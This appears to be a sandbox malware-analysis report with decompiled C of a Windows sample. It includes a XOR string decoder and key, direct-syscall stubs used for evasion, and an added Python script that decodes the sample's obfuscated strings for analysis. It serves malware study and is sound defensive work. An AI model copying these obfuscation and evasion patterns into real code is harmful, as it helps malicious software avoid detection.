                                                          			// hands the results to E00401D58/E00401D18/E00401D98/E004019D8. Arguments shown as ??
                                                          			// were not recovered by the decompiler and are left as they are.
                                                          			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                          				intOrPtr _v24;
                                                          				char _v32;
                                                          				char _v136;
                                                          				void* _v144;
                                                          				char _v152;
                                                          				char _v160;
                                                          				char _v168;
                                                          				char _v176;
                                                          				char _v696;
                                                          				void* _v1216;
                                                          				long long _v1224;
                                                          				long long _v1232;
                                                          				long long _v1256;
                                                          				long long _v1264;
                                                          				long long _v1272;
                                                          				long long _v1280;
                                                          				long long _v1288;
                                                          				long long _v1296;
                                                          				long long _v1304;
                                                          				long long _t105;
                                                          
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				L00402480(); // executed
                                                          				memset(??, ??, ??);
                                                          				_v136 = 0x68;
                                                          				_v144 = 0;
                                                          				_v152 = 0x21f8d4;
                                                          				_v160 = 0;
                                                          				L00402490();
                                                          				E00401000(0x403021,  &_v176);
                                                          				_v1224 = 0x403021;
                                                          				E00401000(0x403027, 0x403021);
                                                          				L00402498();
                                                          				_v1232 = 0x403021;
                                                          				E00401000(0x403032, 0x403021);
                                                          				L004024A0();
                                                          				E00401000(0x403047,  &_v696);
                                                          				sprintf(??, ??);
                                                          				_v1264 =  &_v32;
                                                          				_v1272 =  &_v136;
                                                          				_v1280 = 0;
                                                          				_v1288 = 0;
                                                          				_v1296 = 0;
                                                          				_v1304 = 0;
                                                          				_t105 =  &_v696;
                                                          				L004024A8(); // executed
                                                          				_v1296 = _t105;
                                                          				_v1304 = _t105;
                                                          				E00401D58(_v32,  &_v144,  &_v152,  &_v152); // executed
                                                          				E00401000(0x403051, _v32); // executed
                                                          				_v1304 =  &_v160;
                                                          				E00401D18(_v32, _v144, 0x403051, _v152); // executed
                                                          				_v1304 = 0;
                                                          				E00401D98(_v32,  &_v144,  &_v160, 0); // executed
                                                          				_v1256 = 0;
                                                          				_v1264 = 0;
                                                          				_v1272 = 0;
                                                          				_v1280 = 0;
                                                          				_v1288 = 0;
                                                          				_v1296 = _v144;
                                                          				_v1304 = _v144;
                                                          				E004019D8( &_v168, 0, 0, _v32); // executed
                                                          				E00401C98(_v32, 0, 0, _v32); // executed
                                                          				E00401C98(_v24, 0, 0, _v32);
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID: memsetsprintf
                                                          • String ID:
                                                          • API String ID: 4041149307-0
                                                          • Opcode ID: b3734fdab49db2e8e5c0d38b22238c8b140cd7145616500da49d03b5222e62e5
                                                          • Instruction ID: 078a9e90446ca29d652139c07802c4c69a01c5176e4c1145617d3bb3e72db8bb
                                                          • Opcode Fuzzy Hash: b3734fdab49db2e8e5c0d38b22238c8b140cd7145616500da49d03b5222e62e5
                                                          • Instruction Fuzzy Hash: 99712B61702B148DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3DCA448744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			// String decoder: writes _a16 bytes of the buffer at _a8, each XORed with the
                                                          			// repeating 32-byte key below, into a fresh buffer and NUL-terminates it.
                                                          			// L00402478 is an import thunk whose return value the decompiler did not
                                                          			// propagate; from the loop, _v16 appears to be the output buffer it returned.
                                                          			E00401000(long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                          				long long _v16;
                                                          				signed int _v20;
                                                          				void* _v32;
                                                          				signed char* _v40;
                                                          				signed int _t30;
                                                          
                                                          				_a8 = __rcx;                                  // encoded input bytes
                                                          				_a16 = __rdx;                                 // length in bytes
                                                          				L00402478(); // executed
                                                          				_v16 = _a16 + 1;
                                                          				 *((char*)(_v16 + _a16)) = 0;                 // out[len] = 0
                                                          				_v20 = 0;
                                                          				while(1) {
                                                          					_t30 = _v20;
                                                          					if(_t30 >= _a16) {
                                                          						break;
                                                          					}
                                                          					_v32 = _v16 + _v20;                           // &out[i]
                                                          					_v40 = _a8 + _v20;                            // &in[i]
                                                          					asm("cdq");
                                                          					 *_v32 =  *_v40 ^  *("bvv,bg@643(^+!pw[-x0h5m>,w=g+2i]" + _v20 % 0x20); // out[i] = in[i] ^ key[i % 32]
                                                          					_v20 = _v20 + 1;
                                                          				}
                                                          				return _t30;
                                                          			}

                                                          Strings
                                                          • bvv,bg@643(^+!pw[-x0h5m>,w=g+2i], xrefs: 00401098
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID: bvv,bg@643(^+!pw[-x0h5m>,w=g+2i]
                                                          • API String ID: 0-2925819155
                                                          • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                          • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                          • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                          • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
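E00401000 above is a plain repeating-key XOR: byte i of the input is XORed with byte i % 0x20 of the 32-byte key string, and the key index restarts for every blob, which is why E004010C4 calls it once per constant (0x403021, 0x403027, 0x403032, 0x403047, 0x403051). The following is an added example, not the sample's code or anything from this report, that reimplements the routine in Python so those constants can be decoded out of a memory dump, and adds a phase-scanning helper for the case where the call sites are not known. It assumes the dump is mapped linearly at 0x400000 (the report's dump offset); the placeholder strings embedded in the constructed test image are invented for the example and are not the sample's real decoded strings.

```python
import re

KEY = b"bvv,bg@643(^+!pw[-x0h5m>,w=g+2i]"   # 32-byte key string referenced at 0x00401098
IMAGE_BASE = 0x400000                          # dump "Offset: 00400000" in the report (assumed linear map)


def xor_decode(blob: bytes, key: bytes = KEY) -> bytes:
    """out[i] = blob[i] ^ key[i % 0x20], the loop body of E00401000.

    XOR is its own inverse, so the same function encodes.  The sample also
    NUL-terminates its output buffer; that is irrelevant for a bytes object."""
    if len(key) != 0x20:
        raise ValueError("E00401000 indexes the key with i % 0x20; key must be 32 bytes")
    return bytes(b ^ key[i % 0x20] for i, b in enumerate(blob))


def decode_at(dump: bytes, va: int, length: int, key: bytes = KEY) -> str:
    """Decode `length` bytes at virtual address `va` of a dump mapped at IMAGE_BASE.

    Mirrors a call such as E00401000(0x403021, n): the key phase restarts at the
    first byte of each blob, so the caller must supply the blob's start address."""
    off = va - IMAGE_BASE
    if off < 0 or off + length > len(dump):
        raise ValueError(f"{va:#x}+{length} lies outside the dump")
    return xor_decode(dump[off:off + length], key).decode("latin-1")


def scan_for_strings(dump: bytes, key: bytes = KEY, min_len: int = 6) -> list:
    """Recover candidate strings without knowing their offsets.

    A blob starting at dump offset s decodes with key phase (-s) mod 32, so try
    all 32 phases and report runs of printable ASCII as (va, phase, text).
    Expect noise: a wrong phase can still produce a short printable run by
    chance, so confirm hits against the decompiled call sites."""
    hits = []
    printable = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for phase in range(0x20):
        dec = bytes(b ^ key[(i + phase) % 0x20] for i, b in enumerate(dump))
        for m in printable.finditer(dec):
            hits.append((IMAGE_BASE + m.start(), phase, m.group().decode("ascii")))
    return hits


def build_constructed_dump() -> bytes:
    """Constructed test image: 0xFF filler (which never decodes to printable ASCII
    under this key) plus two placeholder strings encoded with KEY at 0x403021 and
    0x403047.  The addresses are call-site constants from E004010C4; the
    plaintexts are placeholders, not the sample's real strings."""
    dump = bytearray(b"\xff" * 0x4000)
    for va, text in ((0x403021, b"placeholder-one"), (0x403047, b"placeholder-two")):
        enc = xor_decode(text)            # encode == decode for XOR
        dump[va - IMAGE_BASE: va - IMAGE_BASE + len(enc)] = enc
    return bytes(dump)


if __name__ == "__main__":
    img = build_constructed_dump()
    print(decode_at(img, 0x403021, 15))
    for va, phase, text in scan_for_strings(img):
        print(f"{va:#x} phase={phase:2d} {text!r}")
```

Against the real dump, feed `decode_at` the start address and length from each E00401000 call site; the lengths are the second argument the decompiler shows as a pointer here, so read them from the disassembly rather than from the C listing. The scanner is a fallback for blobs whose call sites were not executed in the sandbox.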

                                                          C-Code - Quality: 53%
                                                          			_entry_() {
                                                          				char _v12;
                                                          				long long _v24;
                                                          				long long _v40;
                                                          				void* _t15;
                                                          				void* _t16;
                                                          
                                                          				L00402488();
                                                          				L004024B8();
                                                          				L004024C0();
                                                          				L004024C8();
                                                          				_v24 = __imp____argc;
                                                          				_v40 =  &_v12;
                                                          				L004024D0();
                                                          				_v24 = __imp____argc;
                                                          				_t15 = E0040224F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
                                                          				L004024D8(); // executed
                                                          				return _t15;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                          • Instruction ID: 9686121eb9f72fae5e10ab2d8a3ac4b9ff7170e1f7ab924ecbeb4b8f0178945f
                                                          • Opcode Fuzzy Hash: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                          • Instruction Fuzzy Hash: 9F215B64702A149CEA44DB67DD653A933A5B74DFC8F808436AE0CA73A5EE7DC6508344
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 43%
                                                          			E0040224F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                          				intOrPtr _v12;
                                                          				long long _v24;
                                                          				intOrPtr _t14;

                                                          				// Spill the x64 register arguments (rcx, rdx, r8) into their stack home slots
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				_a24 = __r8;
                                                          				// Helper invoked before main (decompiler-assigned name; body not shown in this report)
                                                          				E00402158(_a16, _a16, _a24);
                                                          				// Hand the C runtime's argc/argv to the program's main routine E004010C4;
                                                          				// the decompiler emits argc (_v24) twice in the call
                                                          				_v24 = __imp____argc;
                                                          				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
                                                          				_v12 = _t14;
                                                          				// Helper invoked after main returns, then propagate main's return value
                                                          				E004021EC();
                                                          				return _v12;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID: memsetsprintf
                                                          • String ID:
                                                          • API String ID: 4041149307-0
                                                          • Opcode ID: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                          • Instruction ID: 0ef21ab13f0e72f5e82b28ca8a1d802b698ef2cd9161ee3339a6462a6fe8d703
                                                          • Opcode Fuzzy Hash: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                          • Instruction Fuzzy Hash: 1501E476702B488DDB40DF67DC9139833A4B349BC8F008826AE0CA7B68DA38C6618744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 40%
                                                          			E004019D8(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                          				void* _t9;
                                                          				signed long long _t11;

                                                          				// Spill the four x64 register arguments into their stack home slots
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				_a24 = __r8;
                                                          				_a32 = __r9;
                                                          				// Shared helper E004018EF followed by a raw syscall instruction: a direct
                                                          				// system-call stub issued from the sample's own code rather than via an ntdll
                                                          				// export (_t11 is left uninitialised by the decompiler)
                                                          				_t9 = E004018EF(_t11, __rcx);
                                                          				asm("syscall");
                                                          				return _t9;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                          • Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
                                                          • Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                          • Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E00401D58(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                          				void* _t9;
                                                          				signed long long _t11;

                                                          				// Spill the four x64 register arguments into their stack home slots
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				_a24 = __r8;
                                                          				_a32 = __r9;
                                                          				// Same direct-syscall stub pattern as E004019D8: helper E004018EF, then a raw
                                                          				// syscall instruction (_t11 is left uninitialised by the decompiler)
                                                          				_t9 = E004018EF(_t11, __rcx);
                                                          				asm("syscall");
                                                          				return _t9;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                          • Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
                                                          • Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                          • Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E00401C98(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                          				void* _t9;
                                                          				signed long long _t11;

                                                          				// Spill the four x64 register arguments into their stack home slots
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				_a24 = __r8;
                                                          				_a32 = __r9;
                                                          				// Same direct-syscall stub pattern as E004019D8: helper E004018EF, then a raw
                                                          				// syscall instruction (_t11 is left uninitialised by the decompiler)
                                                          				_t9 = E004018EF(_t11, __rcx);
                                                          				asm("syscall");
                                                          				return _t9;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                          • Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
                                                          • Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                          • Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E00401D98(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                          				void* _t9;
                                                          				signed long long _t11;

                                                          				// Spill the four x64 register arguments into their stack home slots
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				_a24 = __r8;
                                                          				_a32 = __r9;
                                                          				// Same direct-syscall stub pattern as E004019D8: helper E004018EF, then a raw
                                                          				// syscall instruction (_t11 is left uninitialised by the decompiler)
                                                          				_t9 = E004018EF(_t11, __rcx);
                                                          				asm("syscall");
                                                          				return _t9;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                          • Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
                                                          • Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                          • Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E00401D18(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                          				void* _t9;
                                                          				signed long long _t11;

                                                          				// Spill the four x64 register arguments into their stack home slots
                                                          				_a8 = __rcx;
                                                          				_a16 = __rdx;
                                                          				_a24 = __r8;
                                                          				_a32 = __r9;
                                                          				// Same direct-syscall stub pattern as E004019D8: helper E004018EF, then a raw
                                                          				// syscall instruction (_t11 is left uninitialised by the decompiler)
                                                          				_t9 = E004018EF(_t11, __rcx);
                                                          				asm("syscall");
                                                          				return _t9;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                          • Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
                                                          • Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                          • Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction ID: 60b14b72e3e0ea0da88e42c20eb2fb0a178bd42cc537738f7744dc0a68122fef
                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction Fuzzy Hash: A6C18430714D055BEB98DA288DC97F9B3D1FB98312F9451B9E57AC6186FE30E80287C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5ae6d3f4db7c1bd75c73d5f2d33697750e283b595df3e666c5d50627022404a
                                                          • Instruction ID: a5b3714c091f1343832e4e8ea21b2ad8adfb6eca3b0455810308ecd6e2dfe469
                                                          • Opcode Fuzzy Hash: b5ae6d3f4db7c1bd75c73d5f2d33697750e283b595df3e666c5d50627022404a
                                                          • Instruction Fuzzy Hash: 65F1C530908A8D8FEBA8DF28D845BE937E1FF55310F04826EE84DC7295DF75A9458B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.690464301.00007FFA36120000.00000040.00000001.sdmp, Offset: 00007FFA36120000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbba80772ac63e0376f19ae93e5874f4402dfab87f186469d60a0702d0597991
                                                          • Instruction ID: dec8e5627505930b3d340de9e283504696f21bbcb11374ed19030311acd49304
                                                          • Opcode Fuzzy Hash: dbba80772ac63e0376f19ae93e5874f4402dfab87f186469d60a0702d0597991
                                                          • Instruction Fuzzy Hash: EEE1C330918A8D8FEBA8DF28D845BE977D1FF55310F04826EE84DC7295DF75A8448B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4df33c4ccec31c159c2c9679ea8671149bf8637389190af38ec92ac25d3ec371
                                                          • Instruction ID: 9fe003b4f32dcf71118cd8952619bba45e0b773193a1d1219daa846f58318066
                                                          • Opcode Fuzzy Hash: 4df33c4ccec31c159c2c9679ea8671149bf8637389190af38ec92ac25d3ec371
                                                          • Instruction Fuzzy Hash: B2E17D31508A488BDB59EF28C889BAAB7E1FF94311F14466DE85BC7151EF30E946CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                          • String ID:
                                                          • API String ID: 3902440814-0
                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction ID: 15a844292c89f3f72daf541c025394b0d13d1ac9573b708e0883ef48f92eb59e
                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction Fuzzy Hash: 81816F31208E088FD768EF28C888BE677E1FF95315F404A6DE5ABC7191EE31E5458B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction ID: adcd2c8a5e33f4f70a3bbbe1a87fe11e28c5c7e3182c4e8807c40726d25a0213
                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                          • Instruction Fuzzy Hash: CF31923130CE184BEB88AA689C893AA73D5F7D4311F001169ED5BC3286FD75ED0587C6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction ID: 635e27fb6363ca20dea9b3721f5f09579801abab520607214f7e23ab5c071525
                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                          • Instruction Fuzzy Hash: 1F319031308E184BDB98FA589C8939973D2E7D8721F4002A9AE2BC72C9FE71DD0187C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.683357216.0000025F5EDE0000.00000040.00000001.sdmp, Offset: 0000025F5EDE0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          • Instruction ID: ca89b844bc119fdc8f4a23780cb2e37ec93e546ae41331e6878013268bab2861
                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                          Non-executed Functions

                                                          Executed Functions

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction ID: dfbb956c087a8a903feb29c84c0dd15652ed9fdc258141b039c86a1c6e895085
                                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                          • Instruction Fuzzy Hash: AEC176303149855BFBBDEA28C89DBBFF3D5FB98311F540129D45AC6186DF20D8839A81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.854302382.00007FFA36140000.00000040.00000001.sdmp, Offset: 00007FFA36140000, based on PE: false
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 431b9a84f562f732426cf26c0dfe9273125ce5c31330d9ee667179d9c4dcdc25
                                                          • Instruction ID: c890e2cad29ed467c77b828a2030f1314828c3daff16ce9d8769fd42256e6a32
                                                          • Opcode Fuzzy Hash: 431b9a84f562f732426cf26c0dfe9273125ce5c31330d9ee667179d9c4dcdc25
                                                          • Instruction Fuzzy Hash: FF31D23190C7888FDB5ADB688C467A97FF0EF57320F08429BD049C72A6D665A446CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.846499097.000002C94E0E0000.00000040.00000001.sdmp, Offset: 000002C94E0E0000, based on PE: false
                                                          Similarity
                                                          • API ID: ArrayCreateDestroyInstanceSafe
                                                          • String ID:
                                                          • API String ID: 3902440814-0
                                                          • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction ID: f2b07df485b11813af5f2d177fbd3979006f9ba8851f7fe695754e079a78daef
                                                          • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                          • Instruction Fuzzy Hash: 44816E30208A488FE778EF28C88CBABB7E5FF99315F004A6DD49BC7151EA31E5458B41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
